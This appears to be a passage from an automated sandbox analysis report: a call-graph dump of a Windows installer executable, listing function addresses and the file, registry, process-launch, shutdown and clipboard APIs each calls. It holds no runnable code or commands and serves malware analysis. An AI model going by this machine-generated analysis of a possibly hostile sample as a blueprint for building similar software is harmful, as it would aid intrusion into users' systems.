lstrcpynA 4272->4275 4275->4273 3358 404375 SetErrorMode GetVersion 3359 4043a7 3358->3359 3360 40439b 3358->3360 3362 4043d9 3359->3362 3364 40820e 3 API calls 3359->3364 3361 408299 5 API calls 3360->3361 3361->3359 3363 408299 5 API calls 3362->3363 3365 4043e5 3363->3365 3366 4043c8 lstrlenA 3364->3366 3367 408299 5 API calls 3365->3367 3366->3359 3368 4043f2 InitCommonControls OleInitialize SHGetFileInfoA 3367->3368 3454 407cb6 lstrcpynA 3368->3454 3370 404457 GetCommandLineA 3455 407cb6 lstrcpynA 3370->3455 3372 40446f GetModuleHandleA 3373 404494 3372->3373 3374 4078a4 CharNextA 3373->3374 3375 4044ac CharNextA 3374->3375 3384 4044be 3375->3384 3376 404560 GetTempPathA 3456 4042bc 3376->3456 3379 404580 DeleteFileA 3465 403f03 GetTickCount GetModuleFileNameA 3379->3465 3380 4045a7 GetWindowsDirectoryA 3567 407ce8 lstrcatA 3380->3567 3383 4078a4 CharNextA 3383->3384 3384->3376 3384->3383 3387 404523 3384->3387 3386 4045dd 3557 404316 3386->3557 3566 407cb6 lstrcpynA 3387->3566 3393 40453d 3393->3376 3394 40465b 3495 4060fd 3394->3495 3395 40459a 3395->3386 3395->3394 3399 4078a4 CharNextA 3395->3399 3397 404844 3403 404836 ExitProcess 3397->3403 3404 408299 5 API calls 3397->3404 3398 404826 3585 407836 3398->3585 3401 404608 3399->3401 3406 404662 3401->3406 3408 40461c 3401->3408 3405 40485d 3404->3405 3407 408299 5 API calls 3405->3407 3409 4082eb 5 API calls 3406->3409 3410 40486c 3407->3410 3568 40815b 3408->3568 3412 404667 3409->3412 3413 408299 5 API calls 3410->3413 3584 407ce8 lstrcatA 3412->3584 3416 40487b 3413->3416 3422 4048a1 GetCurrentProcess 3416->3422 3432 4048be 3416->3432 3422->3432 3423 404649 3583 407cb6 lstrcpynA 3423->3583 3424 408299 5 API calls 3433 40493f 3424->3433 3427 404944 ExitWindowsEx 3427->3403 3429 404991 3427->3429 3589 403903 3429->3589 3432->3424 3433->3427 3433->3429 3454->3370 3455->3372 3457 407d37 5 API calls 3456->3457 3458 4042ce 3457->3458 3464 404312 3458->3464 3592 407cf2 lstrlenA CharPrevA 3458->3592 3461 40774b 2 API calls 3462 4042fd 3461->3462 3596 407ad4 3462->3596 3464->3379 3464->3380 3601 407a78 GetFileAttributesA CreateFileA 3465->3601 3467 403f5b 3494 404012 3467->3494 3602 407cb6 lstrcpynA 3467->3602 3469 403f87 3603 4078ce lstrlenA 3469->3603 3473 403fa8 GetFileSize 3492 403fce 3473->3492 3474 4040c3 3610 4039fe 3474->3610 3478 404006 3479 4039fe 31 API calls 3478->3479 3479->3494 3480 404172 GlobalAlloc 3481 404197 3480->3481 3485 407ad4 2 API calls 3481->3485 3483 4039fe 31 API calls 3483->3492 3484 404149 3486 403ae9 ReadFile 3484->3486 3488 4041a7 CreateFileA 3485->3488 3487 40415a 3486->3487 3487->3480 3487->3494 3489 4041f6 3488->3489 3488->3494 3626 403b31 SetFilePointer 3489->3626 3491 404206 3627 403d52 3491->3627 3492->3474 3492->3478 3492->3483 3492->3494 3608 403ae9 ReadFile 3492->3608 3494->3395 3496 408299 5 API calls 3495->3496 3497 406117 3496->3497 3498 406136 3497->3498 3499 40611c 3497->3499 3500 407b3a 3 API calls 3498->3500 3672 407be3 wsprintfA 3499->3672 3501 40616c 3500->3501 3503 4061a4 3501->3503 3506 407b3a 3 API calls 3501->3506 3673 407ce8 lstrcatA 3503->3673 3505 406131 3663 404ae0 3505->3663 3506->3503 3509 40815b 17 API calls 3510 4061e5 3509->3510 3511 4062bc 3510->3511 3513 407b3a 3 API calls 3510->3513 3512 40815b 17 API calls 3511->3512 3514 4062ca 3512->3514 3515 406228 3513->3515 3516 4062e7 LoadImageA 3514->3516 3517 407e06 18 API calls 3514->3517 3515->3511 3523 40625a 3515->3523 3525 4078a4 CharNextA 3515->3525 3518 406405 3516->3518 3519 40632f RegisterClassA 3516->3519 3520 4062e5 3517->3520 3522 403903 2 API calls 3518->3522 3521 406374 SystemParametersInfoA CreateWindowExA 3519->3521 3556 40636d 3519->3556 3520->3516 3521->3518 3524 406411 3522->3524 3674 407cde lstrlenA 3523->3674 3530 404ae0 19 API calls 3524->3530 3524->3556 3525->3523 3533 406421 3530->3533 3536 406513 3533->3536 3537 40642e ShowWindow 3533->3537 3675 404c0d OleInitialize 3536->3675 3541 40820e 3 API calls 3537->3541 3544 406452 3541->3544 3543 40651f 3545 406541 3543->3545 3546 406524 3543->3546 3547 406464 GetClassInfoA 3544->3547 3548 40820e 3 API calls 3544->3548 3549 403903 2 API calls 3545->3549 3554 403903 2 API calls 3546->3554 3546->3556 3550 40648a GetClassInfoA RegisterClassA 3547->3550 3551 4064be DialogBoxParamA 3547->3551 3552 406463 3548->3552 3549->3556 3550->3551 3553 403903 2 API calls 3551->3553 3552->3547 3555 406504 3553->3555 3554->3556 3555->3556 3556->3386 3558 404326 CloseHandle 3557->3558 3559 40433a 3557->3559 3558->3559 3560 404344 CloseHandle 3559->3560 3561 404358 3559->3561 3560->3561 3686 4049da 3561->3686 3566->3393 3777 407cb6 lstrcpynA 3568->3777 3570 408176 3571 407935 3 API calls 3570->3571 3572 408184 3571->3572 3573 40462a 3572->3573 3574 407d37 5 API calls 3572->3574 3573->3386 3582 407cb6 lstrcpynA 3573->3582 3575 408197 3574->3575 3575->3573 3576 4081b7 lstrlenA 3575->3576 3578 408123 2 API calls 3575->3578 3581 4078ce 2 API calls 3575->3581 3576->3575 3577 4081ea 3576->3577 3579 407cf2 3 API calls 3577->3579 3578->3575 3580 4081ef GetFileAttributesA 3579->3580 3580->3573 3581->3575 3582->3423 3583->3394 3586 407850 3585->3586 3587 407855 MessageBoxIndirectA 3585->3587 3586->3587 3588 4078a0 3586->3588 3587->3588 3588->3403 3590 403845 2 API calls 3589->3590 3591 403925 3590->3591 3591->3403 3593 407d1c 3592->3593 3594 4042f0 3592->3594 3600 407ce8 lstrcatA 3593->3600 3594->3461 3597 407ae8 3596->3597 3598 407b27 3597->3598 3599 407aeb GetTickCount GetTempFileNameA 3597->3599 3598->3464 3599->3597 3599->3598 3601->3467 3602->3469 3604 4078e4 3603->3604 3605 4078e9 CharPrevA 3604->3605 3606 403f97 3604->3606 3605->3604 3605->3606 3607 407cb6 lstrcpynA 3606->3607 3607->3473 3609 403b22 3608->3609 3609->3492 3611 403a0b 3610->3611 3612 403a2d 3610->3612 3613 403a14 DestroyWindow 3611->3613 3618 403a1e 3611->3618 3614 403a36 3612->3614 3615 403a48 GetTickCount 3612->3615 3613->3618 3616 408848 2 API calls 3614->3616 3617 403a5a 3615->3617 3615->3618 3616->3618 3619 403a63 3617->3619 3620 403a9b CreateDialogParamA ShowWindow 3617->3620 3618->3480 3618->3494 3625 403b31 SetFilePointer 3618->3625 3619->3618 3641 40392c MulDiv 3619->3641 3621 403a99 3620->3621 3621->3618 3623 403a74 wsprintfA 3624 406fcb 23 API calls 3623->3624 3624->3621 3625->3484 3626->3491 3628 403d92 3627->3628 3629 403d62 SetFilePointer 3627->3629 3642 403b63 GetTickCount 3628->3642 3629->3628 3632 403ea8 3632->3494 3633 403da9 ReadFile 3633->3632 3634 403de2 3633->3634 3634->3632 3635 403b63 41 API calls 3634->3635 3636 403dfe 3635->3636 3636->3632 3637 403eba ReadFile 3636->3637 3639 403e15 3636->3639 3637->3632 3638 403e6b ReadFile 3638->3632 3638->3639 3639->3632 3639->3638 3640 403e23 WriteFile 3639->3640 3640->3632 3640->3639 3641->3623 3643 403b93 3642->3643 3644 403d35 3642->3644 3655 403b31 SetFilePointer 3643->3655 3645 4039fe 31 API calls 3644->3645 3649 403cec 3645->3649 3647 403ba3 SetFilePointer 3654 403be3 3647->3654 3648 403ae9 ReadFile 3648->3654 3649->3632 3649->3633 3651 4039fe 31 API calls 3651->3654 3652 403c98 WriteFile 3652->3649 3652->3654 3653 403d13 SetFilePointer 3653->3644 3654->3648 3654->3649 3654->3651 3654->3652 3654->3653 3656 40893d 3654->3656 3655->3647 3657 40896b 3656->3657 3658 408cf0 3656->3658 3657->3658 3659 408b69 GlobalAlloc 3657->3659 3660 408b4d GlobalFree 3657->3660 3661 408c55 GlobalAlloc 3657->3661 3662 408c45 GlobalFree 3657->3662 3658->3654 3659->3657 3659->3658 3660->3659 3661->3657 3661->3658 3662->3661 3664 404af5 3663->3664 3682 407be3 wsprintfA 3664->3682 3666 404b73 3667 407e06 18 API calls 3666->3667 3668 404b89 SetWindowTextA 3667->3668 3669 404bad 3668->3669 3670 404bcf 3669->3670 3671 407e06 18 API calls 3669->3671 3670->3509 3671->3669 3672->3505 3683 404bd7 3675->3683 3677 404c64 3679 404bd7 SendMessageA 3677->3679 3678 404c41 3678->3677 3680 403845 2 API calls 3678->3680 3681 404c81 OleUninitialize 3679->3681 3680->3678 3681->3543 3682->3666 3684 404be0 SendMessageA 3683->3684 3685 404c0a 3683->3685 3684->3685 3685->3678 3687 4049f4 3686->3687 3688 40435d 3687->3688 3689 4049f9 FreeLibrary GlobalFree 3687->3689 3690 4085b8 3688->3690 3689->3687 3691 40815b 17 API calls 3690->3691 3692 4085cf 3691->3692 3693 4085f3 3692->3693 3694 4085d6 DeleteFileA 3692->3694 3695 404371 OleUninitialize 3693->3695 3697 4087b6 3693->3697 3733 407cb6 lstrcpynA 3693->3733 3694->3695 3695->3397 3695->3398 3697->3695 3738 408123 FindFirstFileA 3697->3738 3698 408625 3700 408630 3698->3700 3701 408648 3698->3701 3741 407ce8 lstrcatA 3700->3741 3703 4078ce 2 API calls 3701->3703 3705 408644 3703->3705 3709 408671 lstrlenA FindFirstFileA 3705->3709 3742 407ce8 lstrcatA 3705->3742 3706 407cf2 3 API calls 3707 4087e2 3706->3707 3708 407a46 2 API calls 3707->3708 3711 4087eb RemoveDirectoryA 3708->3711 3709->3697 3728 4086a7 3709->3728 3713 4087fa 3711->3713 3714 40882c 3711->3714 3713->3695 3716 408800 3713->3716 3717 406fcb 23 API calls 3714->3717 3715 4078a4 CharNextA 3715->3728 3718 406fcb 23 API calls 3716->3718 3717->3695 3719 408810 3718->3719 3720 408311 39 API calls 3719->3720 3723 408822 3720->3723 3721 40878f FindNextFileA 3724 4087ac FindClose 3721->3724 3721->3728 3723->3695 3724->3697 3726 4085b8 56 API calls 3726->3728 3728->3715 3728->3721 3728->3726 3729 408751 3728->3729 3730 406fcb 23 API calls 3728->3730 3734 407cb6 lstrcpynA 3728->3734 3735 407a46 GetFileAttributesA 3728->3735 3729->3728 3731 406fcb 23 API calls 3729->3731 3743 408311 3729->3743 3730->3728 3731->3729 3733->3698 3734->3728 3736 407a71 DeleteFileA 3735->3736 3737 407a5f SetFileAttributesA 3735->3737 3736->3728 3737->3736 3739 408155 3738->3739 3740 408146 FindClose 3738->3740 3739->3695 3739->3706 3740->3739 3744 408299 5 API calls 3743->3744 3745 40832c 3744->3745 3746 408345 3745->3746 3751 4085a8 3745->3751 3769 407a78 GetFileAttributesA CreateFileA 3745->3769 3747 4083b5 GetShortPathNameA 3746->3747 3746->3751 3750 4083d5 3747->3750 3747->3751 3749 40837d CloseHandle GetShortPathNameA 3749->3746 3749->3751 3750->3751 3752 4083e0 wsprintfA 3750->3752 3751->3729 3753 407e06 18 API calls 3752->3753 3754 408423 3753->3754 3770 407a78 GetFileAttributesA CreateFileA 3754->3770 3756 408441 3756->3751 3757 40844f GetFileSize GlobalAlloc 3756->3757 3758 408488 ReadFile 3757->3758 3759 40859e CloseHandle 3757->3759 3758->3759 3760 4084b3 3758->3760 3759->3751 3760->3759 3771 4079b4 lstrlenA 3760->3771 3763 4084d2 3776 407cb6 lstrcpynA 3763->3776 3764 4084ee 3766 4079b4 3 API calls 3764->3766 3767 4084e8 3766->3767 3768 408547 SetFilePointer WriteFile GlobalFree 3767->3768 3768->3759 3769->3749 3770->3756 3772 4079d4 3771->3772 3773 407a05 3772->3773 3774 4079df lstrcmpiA 3772->3774 3773->3763 3773->3764 3774->3773 3775 407a09 CharNextA 3774->3775 3775->3772 3776->3767 3777->3570 4276 403376 4277 401456 18 API calls 4276->4277 4278 403394 4277->4278 4279 40339f SetFilePointer 4278->4279 4282 4033c9 4279->4282 4280 401456 18 API calls 4280->4282 4281 4037a0 4283 402a3c 4281->4283 4284 407e06 18 API calls 4281->4284 4282->4280 4282->4281 4282->4283 4284->4283 4285 4017f7 4286 402530 4285->4286 4289 407be3 wsprintfA 4286->4289 4288 40253c 4289->4288 4297 40247c GetDC GetDeviceCaps 4298 401456 18 API calls 4297->4298 4299 4024ad MulDiv 4298->4299 4300 401456 18 API calls 4299->4300 4301 4024d9 4300->4301 4302 407e06 18 API calls 4301->4302 4303 402520 CreateFontIndirectA 4302->4303 4304 40252f 4303->4304 4307 407be3 wsprintfA 4304->4307 4306 40253c 4307->4306 4308 40367d 4309 401456 18 API calls 4308->4309 4310 403689 4309->4310 4311 4036ae 4310->4311 4312 4036df 4310->4312 4317 402a3c 4310->4317 4313 4036b0 4311->4313 4314 4036ca 4311->4314 4315 403700 4312->4315 4316 4036eb 4312->4316 4324 407cb6 lstrcpynA 4313->4324 4314->4317 4321 401456 18 API calls 4314->4321 4322 4037a0 4314->4322 4319 407e06 18 API calls 4315->4319 4318 401456 18 API calls 4316->4318 4318->4317 4319->4317 4321->4314 4322->4317 4323 407e06 18 API calls 4322->4323 4323->4317 4324->4317 4325 401000 4326 401032 BeginPaint GetClientRect 4325->4326 4327 401017 DefWindowProcA 4325->4327 4329 401078 4326->4329 4332 401212 4327->4332 4330 401130 4329->4330 4331 401084 CreateBrushIndirect FillRect DeleteObject 4329->4331 4333 40113a CreateFontIndirectA 4330->4333 4334 4011db EndPaint 4330->4334 4331->4329 4333->4334 4335 401151 6 API calls 4333->4335 4334->4332 4335->4334 4343 401803 4344 40181c 4343->4344 4345 40180d ShowWindow 4343->4345 4346 40256d ShowWindow 4344->4346 4347 4037d4 4344->4347 4345->4344 4346->4347 4348 402583 4349 401400 18 API calls 4348->4349 4350 40258f 4349->4350 4351 401400 18 API calls 4350->4351 4352 40259e 4351->4352 4353 401400 18 API calls 4352->4353 4354 4025ad 4353->4354 4355 401400 18 API calls 4354->4355 4356 4025bc 4355->4356 4357 40163b 23 API calls 4356->4357 4358 4025c9 ShellExecuteA 4357->4358 3789 401b06 3790 401400 18 API calls 3789->3790 3791 401b12 3790->3791 3792 401b2b 3791->3792 3793 401b3d 3791->3793 3834 407cb6 lstrcpynA 3792->3834 3835 407cb6 lstrcpynA 3793->3835 3796 401b3b 3800 407d37 5 API calls 3796->3800 3797 401b51 3798 407cf2 3 API calls 3797->3798 3799 401b5b 3798->3799 3836 407ce8 lstrcatA 3799->3836 3802 401b76 3800->3802 3803 408123 2 API calls 3802->3803 3820 401ba9 3802->3820 3805 401b88 3803->3805 3804 407a46 2 API calls 3804->3820 3807 401b91 CompareFileTime 3805->3807 3805->3820 3807->3820 3808 401cce 3810 406fcb 23 API calls 3808->3810 3809 401c05 3811 406fcb 23 API calls 3809->3811 3812 401cde 3810->3812 3814 401c15 3811->3814 3813 403d52 46 API calls 3812->3813 3815 401d08 3813->3815 3817 401d25 SetFileTime 3815->3817 3819 401d47 FindCloseChangeNotification 3815->3819 3816 407cb6 lstrcpynA 3816->3820 3817->3819 3818 407e06 18 API calls 3818->3820 3819->3814 3821 401d59 3819->3821 3820->3804 3820->3808 3820->3809 3820->3816 3820->3818 3826 407836 MessageBoxIndirectA 3820->3826 3830 401ca5 3820->3830 3833 407a78 GetFileAttributesA CreateFileA 3820->3833 3822 401d86 3821->3822 3823 401d5e 3821->3823 3825 407e06 18 API calls 3822->3825 3824 407e06 18 API calls 3823->3824 3827 401d72 3824->3827 3828 401d84 3825->3828 3826->3820 3837 407ce8 lstrcatA 3827->3837 3831 407836 MessageBoxIndirectA 3828->3831 3830->3814 3832 406fcb 23 API calls 3830->3832 3831->3814 3832->3814 3833->3820 3834->3796 3835->3797 4366 402008 4367 401456 18 API calls 4366->4367 4368 402016 4367->4368 4369 401456 18 API calls 4368->4369 4371 402025 4369->4371 4373 407be3 wsprintfA 4371->4373 4372 402332 4373->4372 4374 401f08 4375 401400 18 API calls 4374->4375 4376 401f14 4375->4376 4377 401400 18 API calls 4376->4377 4378 401f23 4377->4378 4379 401f34 lstrcmpiA 4378->4379 4380 401f3c lstrcmpA 4378->4380 4381 401f42 4379->4381 4380->4381 4382 402988 4383 401400 18 API calls 4382->4383 4384 402994 4383->4384 4385 401400 18 API calls 4384->4385 4386 4029a7 4385->4386 4387 401400 18 API calls 4386->4387 4388 4029b6 4387->4388 4389 401400 18 API calls 4388->4389 4390 4029c9 4389->4390 4391 401400 18 API calls 4390->4391 4393 4029d8 4391->4393 4392 4029f9 CoCreateInstance 4395 402a2f 4392->4395 4402 402a46 4392->4402 4393->4392 4394 401400 18 API calls 4393->4394 4396 4029f8 4394->4396 4397 40163b 23 API calls 4395->4397 4396->4392 4399 402a3b 4397->4399 4398 402b7c 4398->4395 4400 402bc5 4398->4400 4401 40163b 23 API calls 4400->4401 4401->4399 4402->4398 4403 402b39 MultiByteToWideChar 4402->4403 4403->4398 4404 403089 4413 4015b0 4404->4413 4406 403095 4407 401456 18 API calls 4406->4407 4408 4030a4 4407->4408 4409 4030e5 RegEnumValueA 4408->4409 4410 4030c7 RegEnumKeyA 4408->4410 4412 402a3c 4408->4412 4411 40312b RegCloseKey 4409->4411 4409->4412 4410->4411 4411->4412 4414 401400 18 API calls 4413->4414 4415 4015cc RegOpenKeyExA 4414->4415 4415->4406 4417 40710b 4418 4073a5 4417->4418 4433 40712c 4417->4433 4419 407404 4418->4419 4420 4073ad GetDlgItem CreateThread CloseHandle 4418->4420 4421 40740c 4419->4421 4422 40744f 4419->4422 4423 4074ba 4420->4423 4424 407418 ShowWindow ShowWindow 4421->4424 4425 407449 4421->4425 4422->4423 4428 407473 ShowWindow 4422->4428 4438 407460 4422->4438 4423->4425 4430 4074cd SendMessageA 4423->4430 4465 404c96 SendMessageA 4424->4465 4426 404f0f 8 API calls 4425->4426 4429 407687 4426->4429 4431 407494 4428->4431 4428->4438 4430->4429 4432 4074fc CreatePopupMenu 4430->4432 4434 406fcb 23 API calls 4431->4434 4436 407e06 18 API calls 4432->4436 4463 404c96 SendMessageA 4433->4463 4434->4438 4435 404cc8 SendMessageA 4435->4423 4439 407518 AppendMenuA 4436->4439 4438->4435 4441 407540 GetWindowRect 4439->4441 4442 40755a 4439->4442 4440 4071b9 4444 4071c6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4440->4444 4443 407564 TrackPopupMenu 4441->4443 4442->4443 4443->4429 4445 40759e 4443->4445 4446 407247 SendMessageA SendMessageA 4444->4446 4447 40727f 4444->4447 4451 4075c4 SendMessageA 4445->4451 4452 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4445->4452 4446->4447 4448 407285 SendMessageA 4447->4448 4449 4072a8 4447->4449 4448->4449 4450 404d65 18 API calls 4449->4450 4453 4072c5 4450->4453 4451->4445 4454 40762a SendMessageA 4452->4454 4455 4072d1 ShowWindow 4453->4455 4456 40731c SendMessageA 4453->4456 4454->4454 4457 407664 GlobalUnlock SetClipboardData CloseClipboard 4454->4457 4458 4072f4 ShowWindow 4455->4458 4459 407305 4455->4459 4456->4429 4462 407365 SendMessageA SendMessageA 4456->4462 4457->4429 4458->4459 4464 404c96 SendMessageA 4459->4464 4462->4429 4463->4440 4464->4456 4465->4425 4466 403491 4467 401400 18 API calls 4466->4467 4468 40349d 4467->4468 4469 401400 18 API calls 4468->4469 4471 4034b9 4468->4471 4469->4471 4470 407a46 2 API calls 4472 4034c2 4470->4472 4471->4470 4493 407a78 GetFileAttributesA CreateFileA 4472->4493 4474 4034db 4475 403500 GlobalAlloc 4474->4475 4476 4034e7 DeleteFileA 4474->4476 4478 403644 CloseHandle 4475->4478 4479 40352f 4475->4479 4477 403668 4476->4477 4481 40163b 23 API calls 4477->4481 4485 403677 4477->4485 4478->4476 4478->4477 4494 403b31 SetFilePointer 4479->4494 4481->4485 4482 40353b 4483 403ae9 ReadFile 4482->4483 4484 40354e GlobalAlloc 4483->4484 4486 40356b 4484->4486 4487 4035dd WriteFile GlobalFree 4484->4487 4489 403d52 46 API calls 4486->4489 4488 403d52 46 API calls 4487->4488 4490 40363f 4488->4490 4492 40358f 4489->4492 4490->4478 4491 4035d3 GlobalFree 4491->4487 4492->4491 4493->4474 4494->4482 3317 402613 3318 401400 18 API calls 3317->3318 3319 40261f 3318->3319 3320 406fcb 23 API calls 3319->3320 3321 402632 3320->3321 3333 407779 CreateProcessA 3321->3333 3323 4026b1 CloseHandle 3326 403677 3323->3326 3329 402a3c 3323->3329 3325 402656 WaitForSingleObject 3327 40267b GetExitCodeProcess 3325->3327 3328 40263c 3325->3328 3326->3329 3327->3323 3331 402699 3327->3331 3328->3323 3328->3325 3328->3329 3336 408848 3328->3336 3340 407be3 wsprintfA 3331->3340 3334 4077f5 3333->3334 3335 4077e5 CloseHandle 3333->3335 3334->3328 3335->3334 3337 40885d PeekMessageA 3336->3337 3338 408881 DispatchMessageA 3337->3338 3339 40888d 3337->3339 3338->3337 3339->3328 3340->3323 3350 401714 3351 40171c 3350->3351 3354 403845 3351->3354 3356 403854 3354->3356 3355 40172e 3356->3355 3357 4038a0 MulDiv SendMessageA 3356->3357 3357->3356 4502 406614 GetDlgItem GetDlgItem 4503 406671 7 API calls 4502->4503 4508 4069d1 4502->4508 4504 406797 DeleteObject 4503->4504 4505 406777 SendMessageA 4503->4505 4506 4067b0 4504->4506 4505->4504 4511 40681b 4506->4511 4513 407e06 18 API calls 4506->4513 4507 406af3 4509 406b30 4507->4509 4510 406bf6 4507->4510 4508->4507 4512 406a56 4508->4512 4518 406557 4 API calls 4508->4518 4519 406b49 SendMessageA 4509->4519 4545 4069cb 4509->4545 4515 406c28 4510->4515 4516 406bff SendMessageA 4510->4516 4514 404d65 18 API calls 4511->4514 4512->4507 4522 406ad0 SendMessageA 4512->4522 4531 406c7a 4512->4531 4517 4067d9 SendMessageA SendMessageA 4513->4517 4520 40683e 4514->4520 4523 406c31 4515->4523 4515->4531 4516->4545 4517->4506 4518->4512 4524 406b7b SendMessageA 4519->4524 4519->4545 4525 404d65 18 API calls 4520->4525 4521 404f0f 8 API calls 4526 406eca 4521->4526 4522->4507 4527 406c44 4523->4527 4528 406c3a ImageList_Destroy 4523->4528 4530 406ba1 4524->4530 4535 40685d 4525->4535 4529 406c4d GlobalFree 4527->4529 4527->4545 4528->4527 4529->4545 4536 406bbf SendMessageA 4530->4536 4534 403903 2 API calls 4531->4534 4548 406caf 4531->4548 4553 406e5e 4531->4553 4532 406e73 ShowWindow GetDlgItem ShowWindow 4532->4545 4533 40696b 4537 406971 GetWindowLongA SetWindowLongA 4533->4537 4538 40699f 4533->4538 4534->4548 4535->4533 4541 4068b2 SendMessageA 4535->4541 4542 406902 SendMessageA 4535->4542 4543 406926 SendMessageA 4535->4543 4536->4531 4537->4538 4539 4069c3 4538->4539 4540 4069a5 ShowWindow 4538->4540 4554 404c96 SendMessageA 4539->4554 4540->4539 4541->4535 4542->4535 4543->4535 4545->4521 4546 406e0a InvalidateRect 4547 406e31 4546->4547 4546->4553 4551 404da2 21 API calls 4547->4551 4549 406ced SendMessageA 4548->4549 4550 406d17 4548->4550 4549->4550 4550->4546 4552 406da4 SendMessageA SendMessageA 4550->4552 4551->4553 4552->4550 4553->4532 4553->4545 4554->4545 4555 40239a 4556 401456 18 API calls 4555->4556 4557 4023ae SetWindowLongA 4556->4557 4558 40382c 4557->4558 4559 402f9d 4560 4015b0 19 API calls 4559->4560 4561 402fa9 4560->4561 4562 401400 18 API calls 4561->4562 4563 402fbc 4562->4563 4564 402fd1 RegQueryValueExA 4563->4564 4568 402a3c 4563->4568 4565 403015 4564->4565 4566 403025 RegCloseKey 4564->4566 4565->4566 4570 407be3 wsprintfA 4565->4570 4566->4568 4570->4566 4571 401a9e 4572 401400 18 API calls 4571->4572 4573 401aaa SearchPathA 4572->4573 4574 402dab 4573->4574 4575 40319e 4576 4031c0 4575->4576 4577 4031a7 4575->4577 4578 401400 18 API calls 4576->4578 4579 401456 18 API calls 4577->4579 4580 4031cc 4578->4580 4583 4031b3 4579->4583 4585 407cde lstrlenA 4580->4585 4582 403831 4583->4582 4584 4031f8 WriteFile 4583->4584 4584->4582 4586 4097a6 4587 408a96 4586->4587 4588 408cf0 4586->4588 4587->4588 4589 408b69 GlobalAlloc 4587->4589 4590 408b4d GlobalFree 4587->4590 4591 408c55 GlobalAlloc 4587->4591 4592 408c45 GlobalFree 4587->4592 4589->4587 4589->4588 4590->4589 4591->4587 4591->4588 4592->4591 4600 402ca8 4601 402101 4600->4601 4604 402127 4600->4604 4602 407e06 18 API calls 4601->4602 4603 402115 4602->4603 4605 407836 MessageBoxIndirectA 4603->4605 4605->4604 4606 401e29 4607 401400 18 API calls 4606->4607 4608 401e35 4607->4608 4613 407cde lstrlenA 4608->4613 4614 40342b 4615 401400 18 API calls 4614->4615 4616 403437 FindFirstFileA 4615->4616 4617 40346b 4616->4617 4620 403452 4616->4620 4622 407be3 wsprintfA 4617->4622 4619 40347d 4623 407cb6 lstrcpynA 4619->4623 4622->4619 4623->4620 4624 405bab 4625 405bc1 4624->4625 4626 405be9 4624->4626 4634 407805 GetDlgItemTextA 4625->4634 4628 405c39 4626->4628 4629 405bee SHGetPathFromIDListA 4626->4629 4630 405c04 4629->4630 4633 405bd1 SendMessageA 4629->4633 4632 403903 2 API calls 4630->4632 4632->4633 4633->4628 4634->4633 3862 40322e 3863 401456 18 API calls 3862->3863 3864 40323c 3863->3864 3865 40326b ReadFile 3864->3865 3866 4032bf 3864->3866 3868 4032ef 3864->3868 3870 4032d8 3864->3870 3865->3864 3865->3870 3871 407be3 wsprintfA 3866->3871 3869 4032fb SetFilePointer 3868->3869 3868->3870 3869->3870 3871->3870 4635 4020ae 4636 401400 18 API calls 4635->4636 4637 4020ba 4636->4637 4638 401456 18 API calls 4637->4638 4639 4020c9 wsprintfA 4638->4639 4640 40382f 4639->4640 4641 4015ae 4642 4015b0 4641->4642 4643 401400 18 API calls 4642->4643 4644 4015cc RegOpenKeyExA 4643->4644 4646 401db0 4647 401e0c 4646->4647 4648 401400 18 API calls 4647->4648 4649 401e11 4648->4649 4650 4085b8 63 API calls 4649->4650 4651 401e24 4650->4651 4652 402d34 4653 401400 18 API calls 4652->4653 4654 402d4a 4653->4654 4655 401400 18 API calls 4654->4655 4656 402d59 4655->4656 4657 401400 18 API calls 4656->4657 4658 402d6c GetPrivateProfileStringA 4657->4658 4659 402dab 4658->4659 4660 4057b5 4661 4057d0 4660->4661 4662 40597b 4660->4662 4666 404d65 18 API calls 4661->4666 4663 405987 4662->4663 4664 405a0b 4662->4664 4672 4059b0 GetDlgItem SendMessageA 4663->4672 4687 405a06 4663->4687 4665 405a14 GetDlgItem 4664->4665 4664->4687 4667 405b02 4665->4667 4668 405a37 4665->4668 4670 40583a 4666->4670 4675 405b14 4667->4675 4667->4687 4668->4667 4674 405a65 SendMessageA 4668->4674 4669 404f0f 8 API calls 4671 405b9a 4669->4671 4673 404d65 18 API calls 4670->4673 4697 404d44 EnableWindow 4672->4697 4677 405857 CheckDlgButton 4673->4677 4682 405aa2 SetCursor ShellExecuteA 4674->4682 4678 405b43 4675->4678 4679 405b1a SendMessageA 4675->4679 4694 404d44 EnableWindow 4677->4694 4678->4671 4683 405b4e SendMessageA 4678->4683 4679->4678 4680 405a00 4698 404d05 SendMessageA 4680->4698 4689 405afa SetCursor 4682->4689 4683->4671 4685 405880 GetDlgItem 4695 404c96 SendMessageA 4685->4695 4687->4669 4688 4058a1 SendMessageA 4690 4058e0 SendMessageA SendMessageA 4688->4690 4691 4058d4 GetSysColor 4688->4691 4689->4667 4696 407cde lstrlenA 4690->4696 4691->4690 4694->4685 4695->4688 4697->4680 4698->4687 4699 402db6 4700 402e00 4699->4700 4701 402dbf 4699->4701 4703 401400 18 API calls 4700->4703 4702 4015b0 19 API calls 4701->4702 4704 402dcb 4702->4704 4706 402a3c 4703->4706 4705 401400 18 API calls 4704->4705 4704->4706 4707 402de2 RegDeleteValueA RegCloseKey 4705->4707 4707->4706 4708 401737 4709 406fcb 23 API calls 4708->4709 4710 401747 4709->4710 4711 401fb8 4712 401456 18 API calls 4711->4712 4713 401fc4 4712->4713 4714 401456 18 API calls 4713->4714 4715 401fd3 4714->4715 4716 402339 4717 401456 18 API calls 4716->4717 4718 402345 IsWindow 4717->4718 4719 402354 4718->4719 4720 401db9 4721 401400 18 API calls 4720->4721 4722 401dc5 4721->4722 4723 407836 MessageBoxIndirectA 4722->4723 4724 401dd8 4723->4724 4725 40183b 4726 401400 18 API calls 4725->4726 4727 401847 SetFileAttributesA 4726->4727 4728 401aff 4727->4728 4729 40573f 4730 405792 4729->4730 4731 405759 4729->4731 4732 404f0f 8 API calls 4730->4732 4733 404d65 18 API calls 4731->4733 4734 4057a8 4732->4734 4735 405770 4733->4735 4737 4077fb SetDlgItemTextA 4735->4737 4738 402cbf 4739 402cd1 4738->4739 4740 402cc5 4738->4740 4742 402ceb 4739->4742 4743 401400 18 API calls 4739->4743 4741 401400 18 API calls 4740->4741 4741->4739 4744 401400 18 API calls 4742->4744 4747 402d05 4742->4747 4743->4742 4744->4747 4745 401400 18 API calls 4746 402d14 WritePrivateProfileStringA 4745->4746 4748 402d2d 4746->4748 4747->4745

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00404375 Relevance: 56.4, APIs: 21, Strings: 11, Instructions: 398comfilestringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

